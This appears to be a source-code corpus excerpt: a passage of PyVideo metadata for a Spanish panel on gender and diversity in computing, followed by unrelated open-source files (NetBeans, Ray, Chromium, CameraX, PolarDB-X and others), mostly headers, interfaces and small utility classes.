"copyright_text": "Creative Commons Attribution license (reuse allowed)",
"description": "Debate sobre g\u00e9nero y diversidad. \n\nHablemos del avance del movimiento de mujeres e identidades disidentes, de violencias, diversidad e inclusi\u00f3n en el mundo inform\u00e1tico. \n\nPanelistas: \n\n- Luc\u00<NAME>\u00<NAME> (licenciada en comunicaci\u00f3n social, periodista, directora de la Comisi\u00f3n de DD. HH. en la Legislatura de la Ciudad de Buenos Aires)\n- <NAME> (analista programadora en formaci\u00f3n, trabaja haciendo sat\u00e9lites, form\u00f3 parte de distintos espacios feministas)\n- <NAME> (mujer trans, analista funcional y t\u00e9cnica en operaciones, co-administradora de los grupos de Facebook Transgente y TRANSLABURO)\n- Andr\u00e9s Snitcofsky (dise\u00f1ador gr\u00e1fico en deconstrucci\u00f3n, apasionado de la visualizaci\u00f3n de datos, integrante de Econom\u00eda Femini(s)ta)\n\nModera: <NAME> (licenciada en trabajo social, militante feminista, trabajadora del Programa Nacional de Prevenci\u00f3n del C\u00e1ncer Cervicouterino).\n",
"language": "spa",
"recorded": "2018-11-24",
"speakers": [
"Luc\u00<NAME>\u00<NAME>",
"<NAME>",
"<NAME>",
"Andr\u00<NAME>",
"<NAME>"
],
"tags": [
"panel"
],
"thumbnail_url": "https://i.ytimg.com/vi/jcdJhqKmNyI/hqdefault.jpg",
"title": "import g\u00e9nero, diversidad (panel)",
"videos": [
{
"type": "youtube",
"url": "https://www.youtube.com/watch?v=jcdJhqKmNyI"
}
]
}
| 687 |
1,056 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.netbeans.modules.j2ee.jpa.verification.fixes;
import java.util.logging.Level;
import javax.swing.SwingUtilities;
import org.netbeans.api.project.Project;
import org.netbeans.modules.j2ee.jpa.verification.JPAProblemFinder;
import org.netbeans.modules.j2ee.persistence.provider.InvalidPersistenceXmlException;
import org.netbeans.modules.j2ee.persistence.wizard.Util;
import org.netbeans.spi.editor.hints.ChangeInfo;
import org.netbeans.spi.editor.hints.Fix;
import org.openide.util.NbBundle;
/**
 * {@link Fix} implementation that opens the persistence-unit creation wizard
 * for the project owning the file under verification.
 *
 * @author T<EMAIL>
 */
public class CreatePersistenceUnit implements Fix {
    private Project project;

    /** Creates a new instance of CreatePersistenceUnit */
    public CreatePersistenceUnit(Project project) {
        this.project = project;
    }

    /**
     * Opens the wizard asynchronously on the EDT; invalid persistence.xml
     * errors are logged rather than propagated.
     */
    public ChangeInfo implement(){
        SwingUtilities.invokeLater(new Runnable(){
            public void run() {
                try{
                    Util.createPersistenceUnitUsingWizard(project, null);
                } catch(InvalidPersistenceXmlException e){
                    JPAProblemFinder.LOG.log(Level.WARNING, e.getMessage(), e);
                }
            }
        });
        return null;
    }

    @Override
    public int hashCode(){
        // All instances share one hash code, so equal objects (same project)
        // trivially satisfy the equals/hashCode contract.
        return this.getClass().getName().hashCode();
    }

    @Override
    public boolean equals(Object o){
        if (this == o) {
            return true;
        }
        if (o == null || getClass() != o.getClass()) {
            return false;
        }
        // Two fixes are interchangeable when they target the same project.
        Project other = ((CreatePersistenceUnit) o).project;
        return project == null ? other == null : project.equals(other);
    }

    public String getText(){
        return NbBundle.getMessage(CreatePersistenceUnit.class, "LBL_CreatePersistenceUnitHint");
    }
}
| 849 |
2,177 | <gh_stars>1000+
package org.nutz.ioc.meta.issue1232;
import org.nutz.ioc.loader.annotation.IocBean;
/**
 * Empty marker bean registered under the Ioc name "c"; part of the
 * issue-1232 regression fixture (see the package name).
 */
@IocBean(name="c")
public class Issue1232ClassC {
}
| 69 |
320 | from math import tanh
import gym
RAW_SCORE_SUMMARY_KEY_SUFFIX = 'dmlab_raw_score'
class DmlabRewardShapingWrapper(gym.Wrapper):
    """Reward-shaping wrapper for DMLab environments.

    Applies the optimistic asymmetric reward clipping from the IMPALA paper
    while tracking the raw (unclipped) episode return and episode length,
    both exported via ``info['episode_extra_stats']`` when an episode ends.
    """

    def __init__(self, env):
        super().__init__(env)
        self.raw_episode_return = self.episode_length = 0

    def reset(self):
        observation = self.env.reset()
        self.raw_episode_return = self.episode_length = 0
        return observation

    def step(self, action):
        observation, reward, done, info = self.env.step(action)

        self.raw_episode_return += reward
        self.episode_length += info.get('num_frames', 1)

        # Optimistic asymmetric clipping (IMPALA paper): squash through tanh
        # and additionally scale negative rewards down by 0.3.
        squashed = tanh(reward / 5.0)
        if reward < 0.0:
            squashed = 0.3 * squashed
        reward = squashed * 5.0

        if done:
            info['episode_extra_stats'] = dict()
            level_name = self.unwrapped.level_name
            # the extra 'z_' prefix pushes these keys towards the end on
            # tensorboard (just convenience)
            key_prefix = f'z_{self.unwrapped.task_id:02d}_{level_name}'
            info['episode_extra_stats'][f'{key_prefix}_{RAW_SCORE_SUMMARY_KEY_SUFFIX}'] = self.raw_episode_return
            info['episode_extra_stats'][f'{key_prefix}_len'] = self.episode_length

        return observation, reward, done, info
| 584 |
14,668 | // Copyright 2021 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef CHROME_BROWSER_ENTERPRISE_CONNECTORS_DEVICE_TRUST_BROWSER_BROWSER_DEVICE_TRUST_CONNECTOR_SERVICE_H_
#define CHROME_BROWSER_ENTERPRISE_CONNECTORS_DEVICE_TRUST_BROWSER_BROWSER_DEVICE_TRUST_CONNECTOR_SERVICE_H_
#include "base/memory/raw_ptr.h"
#include "chrome/browser/enterprise/connectors/device_trust/device_trust_connector_service.h"
class PrefService;
namespace enterprise_connectors {
class DeviceTrustKeyManager;
// Browser-specific service in charge of monitoring the status of the Device
// Trust connector (e.g. enabled or not).
class BrowserDeviceTrustConnectorService : public DeviceTrustConnectorService {
 public:
  // |key_manager| is stored unowned and is assumed to outlive this service
  // -- confirm ownership at the call site; |profile_prefs| backs the
  // connector policy for the current profile.
  explicit BrowserDeviceTrustConnectorService(
      DeviceTrustKeyManager* key_manager,
      PrefService* profile_prefs);

  BrowserDeviceTrustConnectorService(
      const BrowserDeviceTrustConnectorService&) = delete;
  BrowserDeviceTrustConnectorService& operator=(
      const BrowserDeviceTrustConnectorService&) = delete;

  ~BrowserDeviceTrustConnectorService() override;

 protected:
  // Hook that is called to notify that the policy changed and the connector
  // became, or is still, enabled.
  void OnConnectorEnabled() override;

 private:
  // Unowned.
  raw_ptr<DeviceTrustKeyManager> key_manager_;
};
} // namespace enterprise_connectors
#endif // CHROME_BROWSER_ENTERPRISE_CONNECTORS_DEVICE_TRUST_BROWSER_BROWSER_DEVICE_TRUST_CONNECTOR_SERVICE_H_
| 476 |
388 | <filename>loadgen/tests/loadgen_test_main.cc
/* Copyright 2019 The MLPerf Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
/// \file
/// \brief A main entry point a test binary can use if it just wants to execute
/// Test::Run on all statically registered tests.
#include <regex>
#include "loadgen_test.h"
// Runs every statically registered test whose name matches the include
// pattern and does not match the (optional) exclude pattern.
int main(int argc, char* argv[]) {
  if (argc <= 1) {
    std::cerr << "Usage: " << argv[0] << " <include_regex> <exclude_regex>\n";
    return -1;
  }

  const std::regex include_regex(argc >= 2 ? argv[1] : ".*");
  // A default-constructed std::regex matches nothing, so with no third
  // argument no tests are excluded.
  const std::regex exclude_regex(argc >= 3 ? std::regex(argv[2]) : std::regex());

  const auto should_run = [&](const char* test_name) {
    if (!std::regex_search(test_name, include_regex)) {
      return false;
    }
    return !std::regex_search(test_name, exclude_regex);
  };
  return Test::Run(should_run);
}
| 439 |
369 | // Copyright (c) 2017-2021, Mudit<NAME>.o. All rights reserved.
// For licensing, see https://github.com/mudita/MuditaOS/LICENSE.md
#pragma once
#include <endpoints/DBHelper.hpp>
#include <CalllogRecord.hpp>
#include <json11.hpp>
namespace sdesktop::endpoints
{

    // DB helper exposing CRUD and query operations on the call log for the
    // desktop endpoint protocol.
    class CalllogHelper : public DBHelper
    {
      public:
        explicit CalllogHelper(sys::Service *_ownerServicePtr) : DBHelper(_ownerServicePtr){};

        // CRUD operations required by DBHelper.
        auto createDBEntry(Context &context) -> sys::ReturnCodes override;
        auto requestDataFromDB(Context &context) -> sys::ReturnCodes override;
        auto updateDBEntry(Context &context) -> sys::ReturnCodes override;
        auto deleteDBEntry(Context &context) -> sys::ReturnCodes override;

        auto requestCount(Context &context) -> sys::ReturnCodes;
        // Serializes a call-log record into the JSON shape described by
        // json::calllog below.
        static auto to_json(CalllogRecord record) -> json11::Json;
        auto getCalllogCount(Context &context) -> sys::ReturnCodes;
        auto getCalllogByContactID(Context &context) -> sys::ReturnCodes;
    };

    // JSON field names used in call-log endpoint payloads.
    namespace json::calllog
    {
        inline constexpr auto count        = "count";
        inline constexpr auto limit        = "limit";
        inline constexpr auto offset       = "offset";
        inline constexpr auto presentation = "presentation";
        inline constexpr auto date         = "date";
        inline constexpr auto duration     = "duration";
        inline constexpr auto id           = "id";
        inline constexpr auto type         = "type";
        inline constexpr auto name         = "name";
        inline constexpr auto contactId    = "contactId";
        inline constexpr auto phoneNumber  = "phoneNumber";
        inline constexpr auto isRead       = "isRead";
    } // namespace json::calllog
} // namespace sdesktop::endpoints
| 689 |
2,180 | package com.xiaojukeji.kafka.manager.service.service;
import com.xiaojukeji.kafka.manager.common.entity.ResultStatus;
import com.xiaojukeji.kafka.manager.common.entity.ao.BrokerBasicDTO;
import com.xiaojukeji.kafka.manager.common.entity.ao.TopicDiskLocation;
import com.xiaojukeji.kafka.manager.common.entity.ao.cluster.ClusterBrokerStatus;
import com.xiaojukeji.kafka.manager.common.entity.metrics.BrokerMetrics;
import com.xiaojukeji.kafka.manager.common.entity.ao.BrokerOverviewDTO;
import com.xiaojukeji.kafka.manager.common.entity.pojo.BrokerDO;
import com.xiaojukeji.kafka.manager.common.entity.pojo.BrokerMetricsDO;
import java.util.Date;
import java.util.List;
import java.util.Set;
/**
 * Service interface for the broker module: broker status, overview listing,
 * JMX/DB metrics and disk-location queries.
 *
 * @author tukun, zengqiao
 * @date 2015/11/9
 */
public interface BrokerService {
    /** Summarized broker status for the given cluster. */
    ClusterBrokerStatus getClusterBrokerStatus(Long clusterId);

    /**
     * Get overview information for the given brokers of a cluster.
     */
    List<BrokerOverviewDTO> getBrokerOverviewList(Long clusterId, Set<Integer> brokerIdSet);

    /**
     * Fetch metrics for several brokers via JMX.
     */
    List<BrokerMetrics> getBrokerMetricsFromJmx(Long clusterId, Set<Integer> brokerIdSet, Integer metricsCode);

    /**
     * Fetch metrics for a single broker via JMX.
     */
    BrokerMetrics getBrokerMetricsFromJmx(Long clusterId, Integer brokerId, Integer metricsCode);

    /**
     * Load persisted broker metrics from the DB for the given time range.
     */
    List<BrokerMetricsDO> getBrokerMetricsFromDB(Long clusterId, Integer brokerId, Date startTime, Date endTime);

    /** Disk locations of the topics hosted on the given broker. */
    List<TopicDiskLocation> getBrokerTopicLocation(Long clusterId, Integer brokerId);

    /**
     * Calculate the broker's peak average bytes-in over the time range.
     * NOTE(review): duration is presumably the averaging window -- confirm
     * against the implementation.
     */
    Double calBrokerMaxAvgBytesIn(Long clusterId,
                                  Integer brokerId,
                                  Integer duration,
                                  Date startTime,
                                  Date endTime);

    /**
     * Get detailed broker information by cluster id and broker id.
     */
    BrokerBasicDTO getBrokerBasicDTO(Long clusterId, Integer brokerId);

    /** Kafka version reported by the broker. */
    String getBrokerVersion(Long clusterId, Integer brokerId);

    /** All broker records. */
    List<BrokerDO> listAll();

    /** Insert-or-update the given broker record; return value semantics are defined by the implementation -- confirm. */
    int replace(BrokerDO brokerDO);

    /** Delete the broker record identified by cluster id and broker id. */
    ResultStatus delete(Long clusterId, Integer brokerId);
}
| 968 |
923 | <gh_stars>100-1000
// Ouzel by <NAME>
#ifndef OUZEL_AUDIO_SOUND_HPP
#define OUZEL_AUDIO_SOUND_HPP
#include <cstdint>
#include <memory>
#include <string>
#include <vector>
namespace ouzel::audio
{
class Audio;
    // A sound resource registered with the Audio engine under a source id.
    class Sound
    {
        friend Audio;
    public:
        // Encoding of the underlying audio data.
        enum class Format
        {
            pcm,
            vorbis
        };

        Sound(Audio& initAudio, std::size_t initSourceId, Format initFormat);
        virtual ~Sound();

        // Non-copyable and non-movable.
        Sound(const Sound&) = delete;
        Sound& operator=(const Sound&) = delete;

        Sound(Sound&&) = delete;
        Sound& operator=(Sound&&) = delete;

        auto getSourceId() const noexcept { return sourceId; }
        auto getFormat() const noexcept { return format; }

    protected:
        // Owning Audio engine; this reference must outlive the Sound --
        // TODO confirm lifetime contract.
        Audio& audio;
        std::size_t sourceId = 0;
        Format format;
    };
#endif // OUZEL_AUDIO_SOUND_HPP
| 406 |
599 | <reponame>laodiu/bk-bcs<gh_stars>100-1000
#!/usr/bin/env python
#-*- coding:utf8 -*-
# Tencent is pleased to support the open source community by making Blueking Container Service available.
# Copyright (C) 2019 THL A29 Limited, a Tencent company. All rights reserved.
# Licensed under the MIT License (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
# http://opensource.org/licenses/MIT
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
def get_cpu_core_dict():
    # Map each physical "core id" found in /proc/cpuinfo to the list of
    # logical processor ids (hyper-threads) belonging to it.
    #
    # NOTE(review): "core id" is only unique within one physical package;
    # on multi-socket hosts, cores from different sockets that share a core
    # id are merged into a single entry -- confirm this is intended.
    cpuinfos = open("/proc/cpuinfo").read()
    # Dump raw cpuinfo for debugging/inspection of the script's output.
    print cpuinfos
    core_dict = {}
    # /proc/cpuinfo separates per-processor sections with blank lines.
    for seg in cpuinfos.split("\n\n"):
        coreid = -1
        processor_list = []
        for line in seg.split("\n"):
            if line.startswith("processor"):
                processorid = line.split(":")[1].strip()
                processor_list.append(int(processorid))
            elif line.startswith("core id"):
                tmp_core_id = line.split(":")[1].strip()
                coreid = int(tmp_core_id)
        # Sections without a "core id" line (e.g. trailing blanks) are skipped.
        if coreid != -1:
            if coreid in core_dict:
                core_dict[coreid] = core_dict[coreid] + processor_list
            else:
                core_dict[coreid] = processor_list
    return core_dict
if __name__ == "__main__":
    # Number of physical cores to reserve (taken from the highest core ids),
    # configured through the environment by the caller.
    reserved_cores_str = os.environ.get("BCS_CPUSET_RESERVED_LAST_CORE_NUM", "")
    if reserved_cores_str == "":
        print "BCS_CPUSET_RESERVED_LAST_CORE_NUM is empty, do not reserve cpu cores"
        sys.exit(0)
    reserved_cores = int(reserved_cores_str)
    core_dict = get_cpu_core_dict()
    # Walk core ids from highest to lowest, collecting the logical processors
    # of the last `reserved_cores` physical cores.
    key_list = core_dict.keys()
    key_list.sort(reverse=True)
    counter = 0
    reserved_logical_core_list = []
    for key in key_list:
        if counter < reserved_cores:
            reserved_logical_core_list = reserved_logical_core_list + core_dict[key]
            counter = counter + 1
        else:
            break
    reserved_logical_core_list.sort()
    print "reserved logical core list: ", reserved_logical_core_list
    # Shell-style export line; presumably eval'd by the calling script --
    # confirm before changing the output format.
    print "export bcsCpuSetReservedCpuSetList=%s" % ",".join(str(x) for x in reserved_logical_core_list)
| 987 |
1,792 | <reponame>javahongxi/whatsmars-mars001
package org.hongxi.whatsmars.boot.sample.swagger.model;
import lombok.Data;
/**
 * Simple user model for the Swagger sample; getters/setters, equals/hashCode
 * and toString are generated by Lombok's {@code @Data}.
 *
 * Created by shenhongxi on 2020/8/16.
 */
@Data
public class User {
    // User name.
    private String name;
    // User age.
    private Integer age;
}
| 98 |
21,382 | // Copyright 2017 The Ray Authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#pragma once
#include "absl/base/thread_annotations.h"
#include "absl/synchronization/mutex.h"
#include "absl/time/clock.h"
#include "ray/common/asio/instrumented_io_context.h"
#include "ray/common/asio/periodical_runner.h"
#include "ray/core_worker/context.h"
#include "ray/gcs/gcs_client.h"
namespace ray {
namespace core {
namespace worker {
// Buffers worker profiling events and periodically flushes them to the GCS.
// AddEvent() may be called concurrently; the pending batch is guarded by
// mutex_ (enforced via the absl thread-safety annotations below).
class Profiler {
 public:
  // \param worker_context Context of the worker whose events are recorded.
  // \param node_ip_address IP address reported with the profile data.
  // \param io_service ASIO loop the periodic flush is scheduled on.
  // \param gcs_client Client used to push profile events to the GCS.
  Profiler(WorkerContext &worker_context, const std::string &node_ip_address,
           instrumented_io_context &io_service,
           const std::shared_ptr<gcs::GcsClient> &gcs_client);

  // Add an event to the queue to be flushed periodically.
  void AddEvent(const rpc::ProfileTableData::ProfileEvent &event) LOCKS_EXCLUDED(mutex_);

 private:
  // Flush all of the events that have been added since last flush to the GCS.
  void FlushEvents() LOCKS_EXCLUDED(mutex_);

  // Mutex guarding rpc_profile_data_.
  absl::Mutex mutex_;

  // ASIO IO service event loop. Must be started by the caller.
  instrumented_io_context &io_service_;

  /// The runner to run function periodically.
  PeriodicalRunner periodical_runner_;

  // RPC message containing profiling data. Holds the queue of profile events
  // until they are flushed.
  std::shared_ptr<rpc::ProfileTableData> rpc_profile_data_ GUARDED_BY(mutex_);

  /// Whether a profile flush is already in progress.
  bool profile_flush_active_ GUARDED_BY(mutex_) = false;

  // Client to the GCS used to push profile events to it.
  std::shared_ptr<gcs::GcsClient> gcs_client_;
};
// Scoped profiling event. The destructor stamps the end time (seconds,
// derived from absl::GetCurrentTimeNanos) and enqueues the finished event on
// the owning Profiler. The constructor is defined out of line; presumably it
// records the event type and start time — confirm in the .cc file.
class ProfileEvent {
 public:
  ProfileEvent(const std::shared_ptr<Profiler> &profiler, const std::string &event_type);

  // Set the end time for the event and add it to the profiler.
  ~ProfileEvent() {
    rpc_event_.set_end_time(absl::GetCurrentTimeNanos() / 1e9);
    profiler_->AddEvent(rpc_event_);
  }

  // Set extra metadata for the event, which could change during the event.
  void SetExtraData(const std::string &extra_data) {
    rpc_event_.set_extra_data(extra_data);
  }

 private:
  // shared_ptr to the profiler that this event will be added to when it is destructed.
  std::shared_ptr<Profiler> profiler_;

  // Underlying proto data structure that holds the event data.
  rpc::ProfileTableData::ProfileEvent rpc_event_;
};
} // namespace worker
} // namespace core
} // namespace ray
| 924 |
1,664 | <reponame>likenamehaojie/Apache-Ambari-ZH
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.ambari.server.utils;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.HashSet;
import java.util.List;
import java.util.Set;
import java.util.regex.Pattern;
import org.junit.Test;
import com.google.gson.JsonElement;
import com.google.gson.JsonParser;
import junit.framework.Assert;
/**
* Complementary class used in tests to check if string representation corresponds to Set/Map
*/
public class CollectionPresentationUtils {

    /**
     * Checks if string representation corresponds to the collection. Parts of an expected collection should not contain
     * delimiter.
     *
     * <p>The input is first trimmed by {@code trimFromStart}/{@code trimFromEnd} characters (e.g. to
     * drop surrounding braces), then split on {@code delimeter}; each expected element cancels at
     * most one matching part. Returns {@code true} when no input part is left over, i.e. the input
     * parts form a sub-multiset of {@code expected}. NOTE(review): elements present in
     * {@code expected} but absent from the input do not fail the check — confirm this asymmetry is
     * intended by callers.
     *
     * @param input         serialized collection, e.g. {@code "{a,b}"}
     * @param expected      elements expected to appear in the input
     * @param delimeter     separator between serialized parts (matched literally)
     * @param trimFromStart number of characters to drop from the start of input
     * @param trimFromEnd   number of characters to drop from the end of input
     */
    public static boolean isStringPermutationOfCollection(String input, Collection<String> expected, String delimeter,
                                                          int trimFromStart, int trimFromEnd) {
        input = input.substring(trimFromStart, input.length() - trimFromEnd);
        // Pattern.quote: treat the delimiter as a literal, not a regex.
        List<String> parts = new ArrayList<>(Arrays.asList(input.split(Pattern.quote(delimeter))));
        for (String part : expected) {
            if (parts.contains(part)) {
                parts.remove(part);
            }
        }
        return parts.isEmpty();
    }

    /** Structural JSON equality: parse both strings and compare the resulting trees. */
    public static boolean isJsonsEquals(String input1, String input2) {
        JsonParser parser = new JsonParser();
        JsonElement input1Parsed = parser.parse(input1);
        JsonElement input2Parsed = parser.parse(input2);

        return input1Parsed.equals(input2Parsed);
    }

    // Self-test for the permutation check, kept inside the utility class.
    @Test
    public void testIsStringPermutationOfCollection() {
        String input1 = "{\"foo\":\"bar\",\"foobar\":\"baz\"}";
        String input2 = "{\"foobar\":\"baz\",\"foo\":\"bar\"}";
        String input3 = "{\"fooba\":\"baz\",\"foo\":\"bar\"}";
        Set<String> expected = new HashSet<>(Arrays.asList(new String[]{"\"foo\":\"bar\"", "\"foobar\":\"baz\""}));

        Assert.assertTrue(CollectionPresentationUtils.isStringPermutationOfCollection(input1, expected, ",", 1, 1));
        Assert.assertTrue(CollectionPresentationUtils.isStringPermutationOfCollection(input2, expected, ",", 1, 1));
        Assert.assertFalse(CollectionPresentationUtils.isStringPermutationOfCollection(input3, expected, ",", 1, 1));
    }
}
| 971 |
480 | /*
* Copyright [2013-2021], Alibaba Group Holding Limited
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.alibaba.polardbx.common.jdbc;
import com.alibaba.polardbx.common.lock.LockingFunctionHandle;
import java.sql.Connection;
import java.sql.SQLException;
import java.util.List;
import java.util.Map;
import java.util.concurrent.Executor;
/**
 * Extension of JDBC {@link Connection} with PolarDB-X specific controls:
 * session state (encoding, sql_mode, server variables), execution metadata
 * (last insert id, found/affected rows) and transaction/batch-insert policies.
 */
public interface IConnection extends Connection {

    /** Forcibly terminate the underlying connection. */
    void kill() throws SQLException;

    /** @return the last insert id recorded on this connection */
    long getLastInsertId();

    void setLastInsertId(long id);

    /** @return the last insert id as returned to the client */
    long getReturnedLastInsertId();

    void setReturnedLastInsertId(long id);

    /** @return auto-generated keys produced by the last statement */
    List<Long> getGeneratedKeys();

    void setGeneratedKeys(List<Long> ids);

    /** @return the transaction policy in effect for this connection */
    ITransactionPolicy getTrxPolicy();

    void setTrxPolicy(ITransactionPolicy trxPolicy);

    /** Resolve the batch-insert policy, possibly influenced by extra command hints. */
    BatchInsertPolicy getBatchInsertPolicy(Map<String, Object> extraCmds);

    void setBatchInsertPolicy(BatchInsertPolicy policy);

    /** Set the character encoding used by this connection. */
    void setEncoding(String encoding) throws SQLException;

    String getEncoding();

    void setSqlMode(String sqlMode);

    String getSqlMode();

    // Marks whether this connection participates in stress testing.
    void setStressTestValid(boolean stressTestValid);

    boolean isStressTestValid();

    @Override
    void setNetworkTimeout(Executor executor, int milliseconds) throws SQLException;

    @Override
    int getNetworkTimeout() throws SQLException;

    /** @return session-level server variables for this connection */
    Map<String, Object> getServerVariables();

    void setServerVariables(Map<String, Object> serverVariables) throws SQLException;

    /** Optional hook: apply global server variables (no-op by default). */
    default void setGlobalServerVariables(Map<String, Object> GlobalServerVariables) throws SQLException {
    }

    /** Optional hook: apply connection-scoped variables (no-op by default). */
    default void setConnectionVariables(Map<String, Object> connectionVariables) throws SQLException {
    }

    long getFoundRows();

    void setFoundRows(long foundRows);

    long getAffectedRows();

    void setAffectedRows(long affectedRows);

    String getUser();

    void setUser(String userName);

    /** Queue a statement for deferred execution on this connection. */
    void executeLater(String sql) throws SQLException;

    /** Flush any statements queued by {@link #executeLater(String)}. */
    void flushUnsent() throws SQLException;

    default long getId() {
        return 0L;
    }

    /** @return a locking-function handle; null when unsupported */
    default LockingFunctionHandle getLockHandle(Object object) {
        return null;
    }

    /** @return connection statistics; null when unsupported */
    default ConnectionStats getConnectionStats() {
        return null;
    }

    /** @return the underlying physical connection ({@code this} by default) */
    default IConnection getRealConnection() {
        return this;
    }

    default int getReadViewId() {
        return -1;
    }

    default void setReadViewId(int readViewId) {
        throw new UnsupportedOperationException("Connection does not support read view id.");
    }
}
| 956 |
3,799 | <filename>camera/camera-video/src/main/java/androidx/camera/video/internal/workaround/CorrectVideoTimeByTimebase.java
/*
* Copyright 2021 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package androidx.camera.video.internal.workaround;
import android.media.MediaCodec;
import android.os.SystemClock;
import androidx.annotation.NonNull;
import androidx.annotation.Nullable;
import androidx.annotation.RequiresApi;
import androidx.camera.core.Logger;
import androidx.camera.video.internal.compat.quirk.CameraUseInconsistentTimebaseQuirk;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.atomic.AtomicBoolean;
/**
* Corrects the video timestamps if video buffer contains REALTIME timestamp.
*
* <p>As described on b/197805856, some Samsung devices use inconsistent timebase for camera
* frame. The workaround detects and corrects the timestamp by generating a new timestamp.
* Note: this will sacrifice the precise timestamp of video buffer.
*
* @see CameraUseInconsistentTimebaseQuirk
*/
@RequiresApi(21) // TODO(b/200306659): Remove and replace with annotation on package-info.java
public class CorrectVideoTimeByTimebase {
    private static final String TAG = "CorrectVideoTimeByTimebase";

    // Lazily initialized on the first valid buffer: true when timestamps look
    // like they are on the elapsedRealtime timebase and must be corrected.
    // NOTE(review): the lazy init is not synchronized — assumes all calls come
    // from a single thread; confirm with callers.
    @Nullable
    private AtomicBoolean mNeedToCorrectVideoTimebase = null;

    /**
     * Corrects the video timestamp if necessary.
     *
     * <p>This method will modify the {@link MediaCodec.BufferInfo#presentationTimeUs} if necessary.
     *
     * @param bufferInfo the buffer info.
     */
    public void correctTimestamp(@NonNull MediaCodec.BufferInfo bufferInfo) {
        // For performance concern, only check the requirement once.
        if (mNeedToCorrectVideoTimebase == null) {
            // Skip invalid buffer
            if (bufferInfo.size <= 0 || bufferInfo.presentationTimeUs <= 0L
                    || (bufferInfo.flags & MediaCodec.BUFFER_FLAG_CODEC_CONFIG) != 0) {
                return;
            }

            long uptimeUs = TimeUnit.MILLISECONDS.toMicros(SystemClock.uptimeMillis());
            long realtimeUs = TimeUnit.MILLISECONDS.toMicros(SystemClock.elapsedRealtime());

            // Expected to be uptime. Decide which clock the timestamp is
            // closer to; closer to elapsedRealtime means the camera used the
            // inconsistent (REALTIME) timebase.
            boolean closeToRealTime = Math.abs(bufferInfo.presentationTimeUs - realtimeUs)
                    < Math.abs(bufferInfo.presentationTimeUs - uptimeUs);

            if (closeToRealTime) {
                Logger.w(TAG, "Detected video buffer timestamp is close to real time.");
            }
            mNeedToCorrectVideoTimebase = new AtomicBoolean(closeToRealTime);
        }

        if (mNeedToCorrectVideoTimebase.get()) {
            // Shift REALTIME-based timestamps back onto the uptime timebase by
            // subtracting the current offset between the two clocks.
            bufferInfo.presentationTimeUs -= TimeUnit.MILLISECONDS.toMicros(
                    SystemClock.elapsedRealtime() - SystemClock.uptimeMillis());
        }
    }
}
| 1,164 |
1,914 | {
"$class": "org.acme.sample.SampleParticipant",
"participantId": "CONGA",
"firstName": "Conga",
"lastName": "Block"
} | 50 |
666 | package com.didispace.scca.rest.dto;
import com.didispace.scca.rest.domain.Permission;
import lombok.Data;
import lombok.NoArgsConstructor;
import java.util.List;
@Data
@NoArgsConstructor
public class PermissionParamDto {

    /**
     * User ID.
     */
    private Long userId;

    /**
     * List of permissions.
     */
    List<Permission> permissions;
}
| 155 |
401 | <filename>src/test/java/org/jf/smalidea/SmaliClassTypeElementTest.java
/*
* Copyright 2014, Google Inc.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are
* met:
*
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following disclaimer
* in the documentation and/or other materials provided with the
* distribution.
* * Neither the name of Google Inc. nor the names of its
* contributors may be used to endorse or promote products derived from
* this software without specific prior written permission.
*
